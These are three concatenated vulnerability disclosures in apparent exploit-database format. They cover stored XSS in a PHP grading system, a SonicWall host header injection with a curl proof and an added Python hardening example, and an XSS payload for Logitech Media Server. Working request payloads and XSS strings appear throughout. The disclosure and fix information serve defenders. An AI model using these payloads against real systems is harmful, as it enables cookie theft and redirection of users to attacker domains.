# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Student Quarterly Grading System v1.0 has Stored XSS at the "Add New Class" Function.

Steps To Reproduce:

1 - Click Class in the menu and click "Add New".
2 - Enter the payload into the "grade" field as "<script>alert(document.cookie);</script>" without double-quotes and choose one of the Subjects from the list. (It can be anything, doesn't matter.)
3 - Click on Save and you are done. It will be triggered when anyone visits the application. It's global and can trigger on any page.

PoC

POST /grading_system/Actions.php?a=save_class HTTP/1.1
Host: localhost
Content-Length: 457
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO6Q8ADzs1UvBltkB
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/?page=class
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
Connection: close

------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="subject_id"

3
------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="grade"

<script>alert(document.cookie);</script>
------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="section"


------WebKitFormBoundaryO6Q8ADzs1UvBltkB--
-
Sonicwall SonicOS 7.0 - Host Header Injection
# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection
# Google Dork: inurl:"auth.html" intitle:"SonicWall"
#              intitle:"SonicWall Analyzer Login"
# Discovered Date: 03/09/2020
# Reported Date: 07/09/2020
# Exploit Author: Ramikan
# Vendor Homepage: sonicwall.com
# Affected Devices: All SonicWall Next Gen 6 Devices
# Tested On: SonicWall NAS 6.2.5
# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3
# Fixed Version: Gen6 firmware 6.5.4.8-89n
# CVE : CVE-2021-20031
# CVSS v3: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
# Category: Hardware, Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/

*************************************************************************************************************************************
Vulnerability 1: Host Header Injection
*************************************************************************************************************************************

Description:

A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.

An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to a potential host header injection attack; the affected hosts can also be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attacks.

Impact:

Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Normal Request
*************************************************************************************************************************************

GET / HTTP/1.1
Host: 192.168.10.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

*************************************************************************************************************************************
Normal Response
*************************************************************************************************************************************

HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
++++++++++++++++++snipped+++++++++++++++++++++++
</head>
<body class="login_bg">
<div class="login_outer">
<div class="login_inner">
<div class="vgap48"></div>
<div class="login_logo"> <img src="logo_sw.png"> </div>
<div class="login_prodname"> Network Security Appliance </div>
<div class="vgap48"></div>
<div class="login_msg_header">
Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>
</div>
<div class="vgap24"></div>
</div>
</div>
</body>
</html>

*************************************************************************************************************************************
POC
*************************************************************************************************************************************

Host Header changed to different domain (fakedomain.com). Fakedomain.com can be found in two lines in the response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Request:
*************************************************************************************************************************************

GET / HTTP/1.1
Host: fakedomain.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: close
Cookie: temp=

*************************************************************************************************************************************
Response:
*************************************************************************************************************************************

HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Type" content="text/html">
<title>Document Moved</title>
<meta name="id" content="docJump" >
<link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css">
<link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css">
<script type="text/JavaScript">
var resetSecureFlag = false;
setTimeout("goJump();", 1000);
function goJump() {
    var jumpURL = "https://fakedomain.com/auth.html";
    var jumpProt = jumpURL.substr(0,6).toLowerCase();
    var ix;
    if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {
        jumpProt = jumpProt.substr(0,ix+1);
        if (location.protocol.toLowerCase() != jumpProt) {
            window.opener = null;
            top.opener = null;
        }
    }
    if (resetSecureFlag) {
        var sessId = getCookie("SessId");
        var pageSeed = swlStore.get("PageSeed", {isGlobal: true});
        if (sessId) {
            setCookieExt("SessId", sessId, { strictSameSite: true });
        }
        if (pageSeed) {
            swlStore.set("PageSeed", pageSeed, {isGlobal: true});
        }
    }
    top.location.href = jumpURL;
}
function setCookie(key, value) {
    var argv = setCookie.arguments;
    var argc = setCookie.arguments.length;
    var expires = (argc > 2) ? argv[2] : null;
    var path = (argc > 3) ? argv[3] : null;
    var domain = (argc > 4) ? argv[4] : null;
    var secure = (argc > 5) ? argv[5] : false;
    document.cookie = key + "=" + escape (value) +
        ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
        ((path == null) ? "" : ("; path=" + path)) +
        ((domain == null) ? "" : ("; domain=" + domain)) +
        ((secure == true) ? "; secure" : "");
}
function getCookie(key) {
    if (document.cookie.length) {
        var cookies = ' ' + document.cookie;
        var start = cookies.indexOf(' ' + key + '=');
        if (start == -1) { return null; }
        var end = cookies.indexOf(";", start);
        if (end == -1) { end = cookies.length; }
        end -= start;
        var cookie = cookies.substr(start,end);
        return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));
    } else {
        return null;
    }
}
</script>
</head>
<body class="login_bg">
<div class="login_outer">
<div class="login_inner">
<div class="vgap48"></div>
<div class="login_logo"> <img src="logo_sw.png"> </div>
<div class="login_prodname"> Network Security Appliance </div>
<div class="vgap48"></div>
<div class="login_msg_header">
Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
</div>
<div class="vgap24"></div>
</div>
</div>
</body>
</html>

The redirection is happening to https://fakedomain.com/auth.html.

*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************

Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"

*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************

Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection.

Workaround: Please disable port 80 to mitigate it; this issue affected all Gen6 firewall products.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019

*************************************************************************************************************************************
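The two reflected lines come from the appliance building jumpURL out of the request's Host header. The following is an added example, not SonicWall code: it shows that construction beside a version that only redirects to a name the device is configured to answer on, which is the kind of check an option like enforce-http-host-check exists for (the implementation is not claimed to be SonicWall's). The canonical hostnames, the sample headers and the response excerpt are constructed for the demo, and the reflection check is the curl one-liner above expressed as a function.

```python
"""Redirect target built from Host (vulnerable) vs. from a configured
hostname allowlist (hardened), plus a reflection check.  Added example;
hostnames, headers and the response sample are constructed."""
from urllib.parse import urlsplit

# Assumption for the demo: the names this appliance is configured to answer on.
CANONICAL_HOSTS = {"192.168.10.1", "fw.example.com"}


def jump_url_vulnerable(headers):
    """Behaviour shown in the PoC response: Host is trusted verbatim."""
    return f"https://{headers['Host']}/auth.html"


def host_is_trusted(host, canonical_hosts=CANONICAL_HOSTS):
    """Normalise the header (drop port, userinfo, case) and compare against
    the configured names.  An empty or malformed Host is not trusted."""
    name = urlsplit(f"//{host}").hostname
    return name is not None and name.lower() in canonical_hosts


def jump_url_hardened(headers, canonical_hosts=CANONICAL_HOSTS):
    """Redirect only to a name we own; None means answer 400, not redirect."""
    host = headers.get("Host", "")
    if not host_is_trusted(host, canonical_hosts):
        return None
    return f"https://{urlsplit(f'//{host}').hostname.lower()}/auth.html"


def reflected_host(body, host):
    """The check behind the curl one-liner above: which lines of the page
    carry the Host value we sent?"""
    return [line for line in body.splitlines() if host.lower() in line.lower()]


# Constructed: the two lines the advisory points at, as they sit in the page.
SAMPLE_RESPONSE = """\
var jumpURL = "https://fakedomain.com/auth.html";
Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
"""

if __name__ == "__main__":
    spoofed = {"Host": "fakedomain.com"}
    print("vulnerable:", jump_url_vulnerable(spoofed))
    print("hardened:  ", jump_url_hardened(spoofed))
    print("hardened:  ", jump_url_hardened({"Host": "FW.example.com:8443"}))
    for line in reflected_host(SAMPLE_RESPONSE, "fakedomain.com"):
        print("reflected: ", line)
```

When testing a device after the firmware update, send the curl request with a Host you do not own and confirm `reflected_host()` returns nothing for the response body; a 400 or a redirect to the device's real name are both acceptable outcomes.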
-
Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
# Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
# Shodan Dork: Search Logitech Media Server
# Date: 12.10.2021
# Exploit Author: Mert Das
# Vendor Homepage: www.logitech.com
# Version: 8.2.0
# Tested on: Windows 10, Linux

POC:

1. Go to Settings / Interface tab
2. Add payload to Title section
3. Payload : "><img src=1 onerror=alert(1)>
4. Alert will popup